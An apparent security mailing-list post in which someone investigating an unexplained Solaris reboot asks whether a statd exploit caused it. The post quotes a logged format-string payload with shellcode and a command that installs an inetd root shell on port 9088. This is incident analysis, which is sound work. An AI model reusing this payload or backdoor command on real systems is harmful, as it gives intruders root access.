A statd exploit?

[Randy Nethers <rnethers () MAIL GEOTOUCH COM>]

Yesterday, a friend of mine from a local university asked me to take a look at
a machine (an Ultra 2 w/Solaris 2.6) which had rebooted itself yesterday morning
(Aug 14th) for no apparent reason.

After poking around, I could find nothing of interest, except two things.
First I found in /var/adm/messages.0 the following line:

Aug 12 00:58:07 ultra2 statd[178]: statd: attempt to create "/var/statmon/sm/%0
8x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %0242x%n%055
x%n%012x%n%0192x%nK^v ^( ^ ^.  #^1 F'F* FF+, NV1@/bin/sh -c echo "9088 stream tc
p nowait root /bin/sh -i" >> /tmp/m; /usr/sbin/inetd /tmp/m;"

Also, this single entry in the messages file is the only message in any of the
log files from Aug 12, which I find strange.  (There are lots of messages in
/var/log/syslog from the Saturday before, but none for Aug 12, for instance
regarding emails going to and from the machine.)

The reboot occured at about 9:30 am, just before people at the office where the
machine is located started using it.  The machine has Oracle on it.  I was
wondering if this might have anything to with the rpc.statd exploit discussed
earlier on this list where a user found a file called /tmp/bob.  I looked, but
obviously, with the machine having been rebooted, there would be nothing in
/tmp.

Anybody have any ideas?

Thanks,

Randy Nethers